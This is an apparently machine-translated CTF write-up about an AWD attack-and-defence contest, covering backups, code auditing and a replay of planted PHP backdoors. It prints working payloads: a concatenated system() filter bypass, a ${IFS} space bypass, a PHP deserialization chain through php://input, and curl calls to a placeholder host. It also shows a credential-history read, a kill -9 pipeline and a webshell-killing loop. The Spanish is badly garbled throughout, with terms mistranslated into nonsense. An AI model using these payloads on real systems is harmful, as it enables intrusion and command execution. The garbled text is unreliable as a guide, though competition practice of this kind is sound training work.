Prefacio:
Antes del final de la revisión fue ocupado, sin tiempo para resumir los sentimientos de competencia y luego reproducir, esta vez para resumir.
La primera línea de entrada en sentimientos AWD
Debido a que es el primer juego AWD tiempo, todos los aspectos de la experiencia son inadecuadas, pocos días antes de la competición también recoger todo tipo de secuencia de comandos loco, marcos, herramientas, etc., sino también consulte el blog del chef para aprender, aquí describir lo que he aprendido proceso:
En primer lugar, hacer una copia de seguridad
Leer un montón de blog de cocinero, algún maestro del blog escribió un juego AWD podría dar la misma contraseña de la cuenta de SSH , para que pueda descargar algunas modificaciones en GitHub SSH contraseña de escritura de lotes que permite que el oponente caiga puntos desde el principio, pero después de este juego, el juego ha descubierto ahora que en realidad esto no vuelva a ocurrir la vulnerabilidad humana , y los organizadores será evitar este tipo de lagunas, de lo contrario todo el partido tiene ningún sentido intención, por lo que creo que el mayor cambio de contraseñas SSH la escritura en línea siguiente juego no sirve para nada, pero en el mejor de una copia de seguridad, en caso de que los organizadores perezoso (que es un poco frío). . .
Cuando hizo eso comienzo del juego para hacerlo, el juego es generalmente un equipo de tres personas, con el fin de conseguir un buen indicador de protección y su propio avión no tripulado en un corto tiempo, necesitamos equipos internos avanzan bien clara división del trabajo , por lo que la eficiencia será alto.
Además de necesitar finalshellesta herramienta, esta herramienta se utiliza para conectar el avión no tripulado, muy conveniente, entra avión no tripulado IP, SSH contraseña de la cuenta para controlar sus aviones no tripulados, como una copia de seguridad, y así prepararse para colgar WAF
inicio de la carrera, el primer paso para la copia de seguridad, lo mejor es usar las herramientas de visualización es FileZilla FTP Clientpara copia de seguridad, también puede utilizar linuxla compresión de comandos de embalaje en sí, con el propósito de copia de seguridad es explotar si la otra en su avión no tripulado su WWWdirectorio para eliminar, Si no ha guardado el equivalente de tiempo de inactividad y, a continuación, esperar a que apunta, por lo que la copia de seguridad es muy importante utilizar los organizadores de SSH账号密码、主机IPcopia de seguridad conectado
En segundo lugar, busque la puerta trasera o vulnerabilidad
Otra ventaja es la capacidad de auditar la fuente de copia de seguridad, porque de todos WWWdirectorio de servicios son los mismos, por lo que si podemos ser el primero en encontrar vulnerabilidades en el código fuente, entonces pueden recibir una división de longitud de onda, donde se utiliza D盾, puede utilizar esta herramienta averiguar si hay puerta trasera u otro punto de uso
también tendría una dirección de ataque, además de a es Seay源代码审计工具
esta una dirección que se puede brindar ataque
En tercer lugar, preparar o secuencia de comandos de escritura
Guión, el guión, el guión ! ! ! Muy importante para participar en una partida se comprueba que la capacidad de la escritura realmente muy importante, identificar vulnerabilidades es importante, pero si no se escribe el guión de lote correspondiente, se puede imaginar simplemente tantos equipos, tres sumisión manual, detrás de la bandera actualiza cada cinco minutos, ineficientes y cansado hasta la muerte, por lo que por todos los medios para mejorar las capacidades de scripting (aunque mi guión chupa, pero mejorará lentamente), juego de AWD a la secuencia de comandos es la capacidad de relación de espalda, siempre primero debe identificar vulnerabilidades. Si eres como yo las capacidades de scripting actualmente son débiles, no se asuste, del chef Github ha escrito una gran cantidad de personas, siempre y cuando entendemos, va a cambiar se puede utilizar en, no lo haré recursos enumerar y Google Baidu buscar en un montón. En una palabra, para aprender Python, aprender a escribir sus propios guiones , muy importante! ! !
Hay una copia de seguridad de POC común, porque la mayoría de los juegos son todo tipo de AWD CMS, CMS más o menos estas lagunas, a veces POC puede ser de gran ayuda, en GitHub tiene, no figuran en esta lista
En cuarto lugar, el estado de ánimo
Participar en un concurso, el proceso básico es el de arriba, pero creo que es importante, no mantenga la mentalidad de lo mucho que tenemos para figurar, poner el estado plano de la mente, no se preocupe, si la persona fue golpeada, va registros de auditoría, ver el chef es la forma de jugar, y ver si otras personas utilizan el ataque, a continuación, puede utilizar este punto de conseguir puntos, si la mentalidad del colapso, todo el juego va a ser divertido, recuerde que debe cambiar su actitud, en las entradas anteriores no se preocupe tanto de la clasificación, no son mejores, no continuar con sus esfuerzos, pero no antes de que la necesidad de resumir en que no estamos en una fila cayó varias veces en un pozo, con el fin de progresar.
En segundo lugar, se reproducen
El juego es relativamente nuevo en el cuidado, CMS lagunas oficiales no aparece, por lo que es inútil POC, pero los organizadores dio a los jugadores dejaron un montón de puerta trasera, el juego sólo ha sido capaz de utilizar un (nuestros más verduras ), pero aún cepillar una gran cantidad de puntos, el juego va a ser el final de todas las vulnerabilidades están reservados para reproducirlo, no porque después del final del juego no hacer nada.
Conecte primero en su propio avión no tripulado
herramienta de uso para conectar con el avión no tripulado, y encontrar el WWWdirectorio de copia de seguridad del servicio correspondiente
se realiza después de copia de seguridad correcta exploraciones D Escudo
encontrado tres mancha sospechosa, un primer vistazo a la primera
La primera puerta trasera: puerta trasera
Troyanos palabra, directamente sobre la espada de hormigas
conexión exitosa puede utilizar el curlcomando para obtener la bandera que quiera, pero una puerta trasera tan simple como todos sabemos, por lo que este necesita para combatir velocidad de la mano, y se manifestarán en la importancia de la escritura de
esto es antes de escribir el chef, que acabamos de modificar algo de competencia específica, sino que también ganó una gran cantidad de bandera, por lo que el guión es muy importante !!!, de hecho, observar el guión, no es difícil de encontrar, es importante esa es la idea, o para practicar más.
La segunda puerta trasera: frase escorpión hielo
Realmente estamos plato, luego se volvió el juego cuando no hay hielo escorpión encontraron esta palabra, cuando reproducible encontrar este caballo escorpión o el hielo descargado cuando el hielo se trata de caballos escorpión. . .
Bueno, entonces si lo ve primero, y siguen alimentando, o sabe muy poco!
La tercera puerta trasera: Puente común
Esta serie de funciones de filtro código de muchos personajes tales como se usan comúnmente en alto riesgo system, etc.
Si son capaces de atravesar la declaración maliciosa de entrada de derivación, se tendría que considerar si se ignora, puedes utilizar costura manera de derivación:
carga útil:
?cmd=$a='syste';$b='m';$c=$a.$b;$c('curl xxx');
De hecho disponible, el más complejo ahora se sienten más verduras. . .
La cuarta puerta trasera: Comando + variable de cobertura
Esto es muy lamentable, entonces, cuando estábamos jugando, fue detectado por una ping_test.phppetición de archivo, vamos a ver un poco de este documento, que realmente es una ejecución de comandos, pero los filtros algunas cosas
la observación de que la introducción de un define.phparchivo, archivo de vista encontró
muy claramente se ve que los espacios de filtro, morir no pueden reproducirse, y yo queremos jugar a mí mismo
Hay maneras de espacios de derivación %09,${IFS}
carga útil:
des=| curl${IFS}xxx
La quinta puerta trasera: Recopilación de Información + + archivo que contiene la deserializado
Al auditar el código fuente que se encuentra en admin.phpencontrado para tener un indicador de
ser el caso, fue a ver de MySQL historyvistazo a lo que ha cambiado
cat /root/.mysql_history
Este directorio se mantiene para MYSQLoperar disco, porque yo estaba aquí para construir su propio local, de modo que no hay información, pero cuando el juego aparecerá un mensaje para \html\public\ueditor\php\controller.php, y luego observó phpinfoy se encontró allow_url_includeen Encendido, se puede utilizar php://inputel protocolo puede ser directamente getshell
Ver archivos encontró
deserializar directa obvia
a oficialPOC
class Control{
public $file = '<?=phpinfo();?>';
private $flag;
public function __destruct(){
if(isset($this->file) && !preg_match('/<\?/is', $this->file)){
require($this->file);
}
}
}
$a = new Control();
$a->file = 'php://input';
echo serialize($a);
Ejecutar la línea
solicitud:
?action=shell&data=O:7:"Control":2: {s:4:"file";s:11:"php://input";s:13:"%00Control%00flag";N;}
entrante POSTAL
<?php system('curl xxx'); ?>
Pero aquí no se reproducen con éxito
Episodio: caballo muerto Subir
En la conexión de hormigas a partir de la espada para pensar en un caballo muerto
encontró que han sido un fracaso, el permiso, obviamente, el juego es la raíz, lo que no hay tubo, que se publicará después supe que WP tiene permiso para cargar en la carpeta de carga. . . .
Oh no terminar este resumen de jugar un respiradero de la liga de cómo me ah tan platos
¿Cómo decir lo siguiente sobre el caballo muerto, para evitar que a mí mismo a olvidar
que este es un caballo muerto común, y estableció sus propias contraseñas se md5cifran, puse aquí selemon
Si tiene éxito carga caballo muerto, disparado en el primer
gatillo éxito, ver
el troyano aparece para conectar
con el éxito! ! !
Si se plantó propio avión no tripulado gente del caballo muerto, y si hay permiso para su uso service apache2 restart, se puede eliminar directamente
Si usted no tiene permiso para matar el reinicio de www-datatodos los usuarios de los procesos secundarios
ps aux | grep www-data | awk '{print $2}' | xargs kill -9
De hecho eliminado correctamente
En tercer lugar, crear un directorio e inmortal Ma Shengcheng de nombres de caballos
platos también, no se reproducen con éxito, específicamente para ver otro chef es todo! !
En cuarto lugar, el uso de escribir una ignore_user_abort(true)función de script ha sido la competencia caballo muerto de archivos de escritura-borrado, que usleep () debe ser inferior al tiempo de los caballos inmortales tiempo usleep () tendrá un efecto
<?php
while (1) {
$pid = 不死马的进程PID;
@unlink(".ski12.php");
exec("kill -9 $pid");
usleep(1000);
}
?>
resumen:
Yo prefiero el segundo para matar el proceso, ya que se encontrará con otro relativamente simple, se estima después, luego decirlo, pero yo estaba muy lote de alimentos, asegúrese de practicar buenas capacidades de scripting, estas técnicas poco cocinero contenido, no me spray. . .
